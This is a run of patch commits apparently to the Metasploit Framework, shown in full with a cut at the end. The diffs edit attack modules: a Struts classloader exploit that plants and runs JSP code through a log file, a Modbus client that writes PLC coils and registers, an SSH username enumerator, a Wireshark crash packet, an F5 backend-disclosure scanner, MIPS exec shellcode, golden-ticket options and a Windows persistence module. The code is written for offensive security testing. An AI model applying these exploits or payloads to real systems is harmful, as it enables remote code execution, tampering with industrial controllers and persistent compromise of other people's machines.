17 00:00:00 2001 From: julianvilas Date: Tue, 29 Apr 2014 11:24:17 +0200 Subject: [PATCH 198/853] Add comments --- .../multi/http/struts_code_exec_classloader.rb | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index d6f11c9fac..8d3743e644 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -90,10 +90,12 @@ class Metasploit3 < Msf::Exploit::Remote date_format = rand_text_numeric(1+rand(4)) vprint_status("#{peer} - Modifying class loader") - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") + + # Modifies classLoader parameters + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix" jsp_file = prefix_jsp jsp_file << date_format @@ -103,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote sleep(3) + # Inexistent URI that logs on previously created log file (with ".jsp" suffix) uri = String.new(datastore['TARGETURI']) uri << rand_text_alphanumeric(4+rand(4)) uri << "?" @@ -115,6 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_file = rand_text_alphanumeric(4+rand(4)) register_files_for_cleanup("#{payload_file}", "#{jsp_file}") + # Commands to be logged exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>") exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>") exec_cmd(uri, "<%@ page import=\"java.io.File\" %>") @@ -133,6 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}") + # Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences uri = "/" uri << jsp_file From 04f2632972932e4ed92980b96988daae75763586 Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Tue, 29 Apr 2014 16:09:47 +0200 Subject: [PATCH 199/853] Implement jvazquez-r7 comments --- .../auxiliary/scanner/scada/modbusclient.rb | 81 +++++++++---------- 1 file changed, 38 insertions(+), 43 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index e5b2bf0f2d..c2620e4a37 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -8,47 +8,42 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp - include Rex::Socket::Tcp def initialize(info = {}) super(update_info(info, - 'Name' => 'Modbus client, reloaded.', + 'Name' => 'Modbus Client Utility', 'Description' => %q{ This module allows reading and writing data to a PLC using the Modbus protocol. - This module is based on the 'modiconstop.rb' Basecamp module from DigitalBond, as well as the mbtget perl script. }, 'Author' => [ - 'EsMnemon ', # original write-only module - 'Arnaud SOULLIE ', # new code that allows read/write + 'EsMnemon ', # original write-only module + 'Arnaud SOULLIE ' # new code that allows read/write ], 'License' => MSF_LICENSE, + 'Actions' => [AuxiliaryAction.new('READ_COIL', {}), + AuxiliaryAction.new('WRITE_COIL', {}), + AuxiliaryAction.new('READ_REGISTER', {}), + AuxiliaryAction.new('WRITE_REGISTER', {}) + ] )) register_options( [ - OptEnum.new("MODE", [true, 'Command', "READ_REGISTER", - [ - "READ_REGISTER", - "READ_COIL", - "WRITE_REGISTER", - "WRITE_COIL" - ] - ]), Opt::RPORT(502), - OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)", 0xBEEF]), - OptInt.new('DATA_ADDRESS', [true, "Modbus data address", 0]), + OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)"]), + OptInt.new('DATA_ADDRESS', [true, "Modbus data address"]), OptInt.new('UNIT_NUMBER', [false, "Modbus unit number", 1]), ], self.class) end # a wrapper just to be sure we increment the counter - def sendframe(payload) + def send_frame(payload) sock.put(payload) - @modbuscounter += 1 - r = sock.recv(65535, 0.1) + @modbus_counter += 1 + r = sock.get return r end @@ -59,13 +54,13 @@ class Metasploit3 < Msf::Auxiliary payload += [datastore['DATA_ADDRESS']].pack("n") payload += [1].pack("n") - packetdata = "" - packetdata += [@modbuscounter].pack("n") - packetdata += "\x00\x00\x00" #dunno what these are - packetdata += [payload.size].pack("c") # size byte - packetdata += payload + packet_data = "" + packet_data += [@modbus_counter].pack("n") + packet_data += "\x00\x00\x00" #dunno what these are + packet_data += [payload.size].pack("c") # size byte + packet_data += payload - return packetdata + return packet_data end def make_write_coil_payload(data) @@ -76,13 +71,13 @@ class Metasploit3 < Msf::Auxiliary payload += [data].pack("c") payload += "\x00" - packetdata = "" - packetdata += [@modbuscounter].pack("n") - packetdata += "\x00\x00\x00" #dunno what these are - packetdata += [payload.size].pack("c") # size byte - packetdata += payload + packet_data = "" + packet_data += [@modbus_counter].pack("n") + packet_data += "\x00\x00\x00" #dunno what these are + packet_data += [payload.size].pack("c") # size byte + packet_data += payload - return packetdata + return packet_data end def make_write_register_payload(data) @@ -92,27 +87,27 @@ class Metasploit3 < Msf::Auxiliary payload += [datastore['DATA_ADDRESS']].pack("n") payload += [data].pack("n") - packetdata = "" - packetdata += [@modbuscounter].pack("n") - packetdata += "\x00\x00\x00" #dunno what these are - packetdata += [payload.size].pack("c") # size byte - packetdata += payload + packet_data = "" + packet_data += [@modbus_counter].pack("n") + packet_data += "\x00\x00\x00" #dunno what these are + packet_data += [payload.size].pack("c") # size byte + packet_data += payload - return packetdata + return packet_data end def run - @modbuscounter = 0x0000 # used for modbus frames + @modbus_counter = 0x0000 # used for modbus frames connect - case datastore['MODE'] + case datastore['ACTION'] when "READ_COIL" @function_code = 1 - response = sendframe(make_read_payload) + response = send_frame(make_read_payload) print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) when "READ_REGISTER" @function_code = 3 - response = sendframe(make_read_payload) + response = send_frame(make_read_payload) value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) @@ -126,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Data value must be 0 or 1 in WRITE_COIL mode") exit end - response = sendframe(make_write_coil_payload(data)) + response = send_frame(make_write_coil_payload(data)) print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") when "WRITE_REGISTER" @@ -135,11 +130,11 @@ class Metasploit3 < Msf::Auxiliary print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") exit end - response = sendframe(make_write_register_payload(datastore['DATA'])) + response = send_frame(make_write_register_payload(datastore['DATA'])) print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") else - print_error("Invalid MODE") + print_error("Invalid ACTION") return end end From e386855e0ef99c8fa4efab45a0887578723321fb Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Tue, 29 Apr 2014 16:55:05 +0200 Subject: [PATCH 200/853] Add ACTIONS descriptions --- modules/auxiliary/scanner/scada/modbusclient.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index c2620e4a37..cc630539df 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -23,10 +23,10 @@ class Metasploit3 < Msf::Auxiliary 'Arnaud SOULLIE ' # new code that allows read/write ], 'License' => MSF_LICENSE, - 'Actions' => [AuxiliaryAction.new('READ_COIL', {}), - AuxiliaryAction.new('WRITE_COIL', {}), - AuxiliaryAction.new('READ_REGISTER', {}), - AuxiliaryAction.new('WRITE_REGISTER', {}) + 'Actions' => [AuxiliaryAction.new('READ_COIL', {'Description' => "Read one bit from a coil"}), + AuxiliaryAction.new('WRITE_COIL', {'Description' => "Write one bit to a coil"}), + AuxiliaryAction.new('READ_REGISTER', {'Description' => "Read one word from a register"}), + AuxiliaryAction.new('WRITE_REGISTER', {'Description' => "Write one word to a register"}) ] )) register_options( From 88efeea378bc86cbecd5b9c5910c359bc9e39daa Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 29 Apr 2014 16:07:42 +0100 Subject: [PATCH 201/853] Add a false positive check --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index c3f0b591d4..04e18c4fd8 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -69,6 +69,13 @@ class Metasploit3 < Msf::Auxiliary datastore['THRESHOLD'] end + # Returns true if a nonsense username appears active. + def check_false_positive(ip) + user = Rex::Text.rand_text_alphanumeric(16) + result = attempt_user(user, ip) + return(result == :success) + end + def check_user(ip, user, port) pass = Rex::Text.rand_text_alphanumeric(64_000) @@ -164,7 +171,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) print_status "#{peer(ip)} Starting scan" - user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } + print_status "#{peer(ip)} Checking for false positives" + if check_false_positive(ip) + print_error "#{peer(ip)} throws false positive results. Aborting." + return + else + user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } + end end end From a5983b5f573fe9eddf6f0faa59b193542501253c Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 29 Apr 2014 16:14:41 +0100 Subject: [PATCH 202/853] Light touchup on FP checker --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 04e18c4fd8..6936ec3c07 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary # Returns true if a nonsense username appears active. def check_false_positive(ip) - user = Rex::Text.rand_text_alphanumeric(16) + user = Rex::Text.rand_text_alphanumeric(8) result = attempt_user(user, ip) return(result == :success) end @@ -170,12 +170,12 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status "#{peer(ip)} Starting scan" print_status "#{peer(ip)} Checking for false positives" if check_false_positive(ip) print_error "#{peer(ip)} throws false positive results. Aborting." return else + print_status "#{peer(ip)} Starting scan" user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } end end From 8e8fbfe583622f5e60be68b7e317838d980545f6 Mon Sep 17 00:00:00 2001 From: julianvilas Date: Tue, 29 Apr 2014 17:36:04 +0200 Subject: [PATCH 203/853] Fix msf-staff comments --- .../multi/http/struts_code_exec_classloader.rb | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 8d3743e644..7f040386e1 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -24,8 +24,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ - 'Mark Thomas and Przemyslaw Celej', # Vulnerability Discovery - 'Alvaro Munoz', # PoC + 'Mark Thomas', # Vulnerability Discovery + 'Przemyslaw Celej', # Vulnerability Discovery + 'pwntester ', # PoC 'Redsadic ' # Metasploit Module ], 'License' => MSF_LICENSE, @@ -80,10 +81,6 @@ class Metasploit3 < Msf::Exploit::Remote end - def peer - "#{rhost}:#{rport}" - end - def exploit prefix_jsp = rand_text_alphanumeric(3+rand(3)) @@ -103,9 +100,9 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("#{peer} - created file at http://#{peer}/#{jsp_file}") - sleep(3) + Rex.sleep(3) - # Inexistent URI that logs on previously created log file (with ".jsp" suffix) + # Inexistent URI that logs on previously created log file (with ".jsp" suffix) uri = String.new(datastore['TARGETURI']) uri << rand_text_alphanumeric(4+rand(4)) uri << "?" @@ -133,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("#{peer} - Waiting 10 seconds...") - sleep(10) + Rex.sleep(10) vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}") From 55d8be8238742b2816a711611c7ad1968fb72b9b Mon Sep 17 00:00:00 2001 From: JoseMi Date: Tue, 29 Apr 2014 22:55:14 +0100 Subject: [PATCH 204/853] Add cve-2013-4074 module to crash dissector capwap --- .../windows/misc/wireshark_capwap_dos.rb | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 modules/exploits/windows/misc/wireshark_capwap_dos.rb diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb new file mode 100644 index 0000000000..818d62692a --- /dev/null +++ b/modules/exploits/windows/misc/wireshark_capwap_dos.rb @@ -0,0 +1,67 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = GoodRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark <= 1.8.7 CAPWAP dissector crash - DoS', + 'Description' => %q{ + This module inject malicioous packet udp to crash wireshark + ) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + ], + 'References' => + [ + [ 'CVE', '2013-4074'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'DisableNops' => 'True', + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Wireshark CAPWAP dissector CRASH', + { + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2014', + 'DefaultTarget' => 0)) + + # Protocol capwap needs port 5247 to trigger the dissector in wireshark + register_options([ Opt::RPORT(5247) ], self.class) + + end + + def exploit + + connect_udp + + # We send a packet incomplete to crash dissector + print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") + buf = "\x90" * 18 + udp_sock.put(buf) + + disconnect_udp + + end +end From b0da032136d572c237ea8b64ee05b35b3095f913 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Tue, 29 Apr 2014 23:06:30 +0100 Subject: [PATCH 205/853] Modified the metadatas --- modules/exploits/windows/misc/wireshark_capwap_dos.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb index 818d62692a..603f5e81ca 100644 --- a/modules/exploits/windows/misc/wireshark_capwap_dos.rb +++ b/modules/exploits/windows/misc/wireshark_capwap_dos.rb @@ -13,15 +13,17 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark <= 1.8.7 CAPWAP dissector crash - DoS', + 'Name' => 'Wireshark CAPWAP dissector crash', 'Description' => %q{ - This module inject malicioous packet udp to crash wireshark + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. ) }, 'License' => MSF_LICENSE, 'Author' => [ 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" ], 'References' => [ From ace9e797e1326a1e8fc212d2e2f0da80b5c5b6e1 Mon Sep 17 00:00:00 2001 From: nstarke Date: Tue, 29 Apr 2014 22:10:08 +0000 Subject: [PATCH 206/853] Adding count-based print message This commit removes the creation of a separate, timed thread for printing out status messages to the user in the case of large PASS_FILEs. This adjustment eliminates the overheard of context switching associated with spinning off separate threads, as well as the dangers associated with the Thread#kill method. --- lib/msf/core/auxiliary/auth_brute.rb | 23 ++++++----------------- 1 file changed, 6 insertions(+), 17 deletions(-) diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb index 076e818f5f..00140d8a79 100644 --- a/lib/msf/core/auxiliary/auth_brute.rb +++ b/lib/msf/core/auxiliary/auth_brute.rb @@ -331,22 +331,6 @@ module Auxiliary::AuthBrute creds = [ [], [], [], [] ] # userpass, pass, user, rest remaining_pairs = combined_array.length # counter for our occasional output - status = Thread.new do - loop do - # Ruby's sleep function is not terribly accurate. - # Since all we are trying to do is let the user know - # that the process is still working and giving them - # an estimate as to how many pairs are left, - # precision may not be of the utmost necessity - sleep 100 - # Let the user know the combined pair list is still building - # and tell them how many pairs are left to process. - print_brute( - :level => :vstatus, - :msg => "Pair list is still building with #{remaining_pairs} pairs left to process" - ) - end - end # Move datastore['USERNAME'] and datastore['PASSWORD'] to the front of the list. # Note that we cannot tell the user intention if USERNAME or PASSWORD is blank -- # maybe (and it's often) they wanted a blank. One more credential won't kill @@ -361,9 +345,14 @@ module Auxiliary::AuthBrute else creds[3] << pair end + if remaining_pairs % 500000 == 0 + print_brute( + :level => :vstatus, + :msg => "Pair list is still building with #{remaining_pairs} pairs left to process" + ) + end remaining_pairs -= 1 end - status.kill return creds[0] + creds[1] + creds[2] + creds[3] end From c3fb5bf61419732343462bd1ce0bc7e75f15e798 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Tue, 29 Apr 2014 22:42:26 -0400 Subject: [PATCH 207/853] fix a few clarical errors and typos --- .../meterpreter/ui/console/command_dispatcher/kiwi.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index be6500b771..628df53d87 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -146,9 +146,9 @@ class Console::CommandDispatcher::Kiwi "-u" => [ true, "Name of the user to create the ticket for" ], "-i" => [ true, "ID of the user to associate the ticket with" ], "-g" => [ true, "Comma-separated list of group identifiers to include (eg: 501,502)" ], - "-d" => [ true, "Name of the target domain" ], - "-k" => [ true, "Kerberos ticket granting token" ], - "-t" => [ true, "Path of the file to store the ticket in" ], + "-d" => [ true, "Name of the target domain (FQDN)" ], + "-k" => [ true, "krbtgt domain user NTLM hash" ], + "-t" => [ true, "Local path of the file to store the ticket in" ], "-s" => [ true, "SID of the domain" ] ) @@ -157,7 +157,7 @@ class Console::CommandDispatcher::Kiwi # def golden_ticket_create_usage print( - "\nUsage: kerberos_ticket_list [-h] -u -d -k -s [-i ] [-g -t \n\n" + + "\nUsage: golden_ticket_create [-h] -u -d -k -s -t [-i ] [-g ]\n\n" + "Create a golden kerberos ticket that expires in 10 years time.\n\n" + @@golden_ticket_create_opts.usage) end @@ -304,7 +304,7 @@ class Console::CommandDispatcher::Kiwi # Invoke the kerberos ticket purging functionality on the target machine. # def cmd_kerberos_ticket_purge(*args) - client.kiwi.keberos_ticket_purge + client.kiwi.kerberos_ticket_purge print_good("Kerberos tickets purged") end From 4e80e1c2397a953bc239623a1b4e3e5c7aa82225 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 30 Apr 2014 09:31:07 -0500 Subject: [PATCH 208/853] Clean up pull request code --- .../gather/f5_bigip_cookie_disclosure.rb | 113 +++++++++++------- 1 file changed, 72 insertions(+), 41 deletions(-) diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index b1b57bd1d3..838bc2803e 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -12,10 +12,10 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'F5 Bigip Backend IP/PORT Cookie Disclosure.', + 'Name' => 'F5 BigIP Backend Cookie Disclosure', 'Description' => %q{ - This module identify F5 BigIP SLB and decode sticky cookies which leak - backend IP and port. + This module identify F5 BigIP Load Balancers and leaks backends + information through cookies. }, 'Author' => [ 'Thanat0s ' ], 'References' => @@ -29,66 +29,97 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('TARGETURI', [true, 'The URI path to test', '/']), - OptInt.new('RETRY', [true, 'Number of requests to try to find backends', 10]) + OptInt.new('REQUESTS', [true, 'Number of requests to send to disclose back', 10]) ], self.class) end - def cookie_decode(cookie_value) - m = cookie_value.match(/(\d+)\.(\d+)\./) - host = (m.nil?) ? nil : m[1] - port = (m.nil?) ? nil : m[2] - unless host.nil? && port.nil? - port = (("%04X" % port).slice(2,4) << ("%04X" % port).slice(0,2)).hex.to_s - byte1 = ("%08X" % host).slice(6..7).hex.to_s - byte2 = ("%08X" % host).slice(4..5).hex.to_s - byte3 = ("%08X" % host).slice(2..3).hex.to_s - byte4 = ("%08X" % host).slice(0..1).hex.to_s - host = byte1 << "." << byte2 << "." << byte3 << "." << byte4 + def change_endianness(value, size=4) + conversion = value + + if size == 4 + conversion = [value].pack("V").unpack("N").first + elsif size == 2 + conversion = [value].pack("v").unpack("n").first end - return host,port + + conversion + end + + def cookie_decode(cookie_value) + back_end = "" + + if cookie_value =~ /(\d{8})\.(\d{5})\./ + host = $1.to_i + port = $2.to_i + + host = change_endianness(host) + host = Rex::Socket.addr_itoa(host) + + port = change_endianness(port, 2) + + back_end = "#{host}:#{port}" + end + + back_end end def get_cookie # request a page and extract a F5 looking cookie. + cookie = {} res = send_request_raw({ 'method' => 'GET', 'uri' => @uri }) - id,value = nil - # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" - m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - unless m.nil? - id = (m.nil?) ? nil : m[1] - value = (m.nil?) ? nil : m[2] - return id, value + + unless res.nil? + # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" + m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + unless m.nil? + cookie[:id] = (m.nil?) ? nil : m[1] + cookie[:value] = (m.nil?) ? nil : m[2] + end end + + cookie end def run - host_port = [] - @uri = normalize_uri(target_uri.path) - print_status("Starting request #{@uri}") - for i in 0...datastore['RETRY'] - id, value = get_cookie() # Get the cookie + unless datastore['REQUESTS'] > 0 + print_error("Please, configure more than 0 REQUESTS") + return + end + + back_ends = [] + @uri = normalize_uri(target_uri.path.to_s) + print_status("#{peer} - Starting request #{@uri}") + + for i in 0...datastore['REQUESTS'] + cookie = get_cookie() # Get the cookie # If the cookie is not found, stop process - unless id - print_error("F5 SLB cookie not found") - return + if cookie.empty? || cookie[:id].nil? + print_error("#{peer} - F5 Server Load Balancing cookie not found") + break end + # Print the cookie name on the first request if i == 0 - print_status("F5 cookie \"#{id}\" found") + print_status("#{peer} - F5 Server Load Balancing \"#{cookie[:id]}\" found") end - host, port = cookie_decode(value) - unless host_port.include? (host+":"+port) - host_port.push(host+":"+port) - print_status("Backend #{host}:#{port}") + + back_end = cookie_decode(cookie[:value]) + unless back_ends.include?(back_end) + print_status("#{peer} - Backend #{back_end} found") + back_ends.push(back_end) end end + # Reporting found backends in database - report_note( - :host => rhost, - :type => "F5_Cookie_Backends", - :data => host_port - ) + unless back_ends.empty? + report_note( + :host => rhost, + :type => "f5_load_balancer_backends", + :data => back_ends + ) + end + end end From 7777202045bbed04ad632470ca63414eb5b6fbaf Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 29 Apr 2014 10:48:32 -0500 Subject: [PATCH 209/853] Deconflict #3310 and correct the description --- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 6936ec3c07..374d15b2ca 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -16,17 +16,17 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SSH Username Enumeration', 'Description' => %q{ - This module uses a time-based attack to enumerate users in a OpenSSH server. - On some versions of OpenSSH under some configurations, OpenSSH will prompt - for a password for an invalid user faster than for a valid user. - }, - 'Author' => ['kenkeiras'], - 'References' => - [ - ['CVE', '2006-5229'], - ['OSVDB', '32721'], - ['BID', '20418'] - ], + This module uses a time-based attack to enumerate users on an OpenSSH server. + On some versions of OpenSSH under some configurations, OpenSSH will return a + "permission denied" error for an invalid user faster than for a valid user. + }, + 'Author' => ['kenkeiras'], + 'References' => + [ + ['CVE', '2006-5229'], + ['OSVDB', '32721'], + ['BID', '20418'] + ], 'License' => MSF_LICENSE )) From 111160147f64a8aac63b17fa01bdd0b6cb9f2d78 Mon Sep 17 00:00:00 2001 From: Michael Messner Date: Wed, 30 Apr 2014 20:37:54 +0200 Subject: [PATCH 210/853] MIPS exec payload fixes for encoder --- modules/payloads/singles/linux/mipsbe/exec.rb | 8 +++++++- modules/payloads/singles/linux/mipsle/exec.rb | 10 ++++++++-- 2 files changed, 15 insertions(+), 3 deletions(-) diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb index a4e5dbda29..ed84d5faac 100644 --- a/modules/payloads/singles/linux/mipsbe/exec.rb +++ b/modules/payloads/singles/linux/mipsbe/exec.rb @@ -66,7 +66,13 @@ module Metasploit3 # # Constructs the payload # - return super + shellcode + command_string + "\x00" + + shellcode = shellcode + command_string + "\x00" + + # we need to align our shellcode to 4 bytes + (shellcode = shellcode + "\x00") while shellcode.length%4 != 0 + + return super + shellcode end diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb index b71feda883..03803e3399 100644 --- a/modules/payloads/singles/linux/mipsle/exec.rb +++ b/modules/payloads/singles/linux/mipsle/exec.rb @@ -62,12 +62,18 @@ module Metasploit3 "\xec\xff\xa0\xaf" + # sw zero,-20(sp) "\xe8\xff\xa5\x27" + # addiu a1,sp,-24 "\xab\x0f\x02\x24" + # li v0,4011 - "\x0c\x01\x01\x01" # + syscall 0x40404 + "\x0c\x01\x01\x01" # syscall 0x40404 # # Constructs the payload # - return super + shellcode + command_string + "\x00" + + shellcode = shellcode + command_string + "\x00" + + # we need to align our shellcode to 4 bytes + (shellcode = shellcode + "\x00") while shellcode.length%4 != 0 + + return super + shellcode end From fdc81b198f11d1c4d6cdb6ed612fce6dad1d9566 Mon Sep 17 00:00:00 2001 From: kaospunk Date: Wed, 30 Apr 2014 16:08:48 -0400 Subject: [PATCH 211/853] Adds the ability to specify path This update allows an explicit path to be set rather than purely relying on the TEMP environment variable. --- modules/exploits/windows/local/persistence.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 9ce47a82fc..6fffe1f172 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Local OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]), OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]), OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']), + OptString.new('PATH',[false, 'PATH to write payload']), ], self.class) end @@ -130,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Local # Writes script to target host def write_script_to_target(vbs,name) - tempdir = session.sys.config.getenv('TEMP') + tempdir = datastore['PATH'] || session.sys.config.getenv('TEMP') if name == nil tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else From 6b740b727b78ac1e5aa85967ce90ae6c0a7d1ae5 Mon Sep 17 00:00:00 2001 From: kaospunk Date: Wed, 30 Apr 2014 17:26:36 -0400 Subject: [PATCH 212/853] Changes PATH to proper case This changes PATH to Path --- modules/exploits/windows/local/persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 6fffe1f172..b98e2e0970 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Local OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]), OptString.new('REXENAME',[false, 'The name to call payload on remote 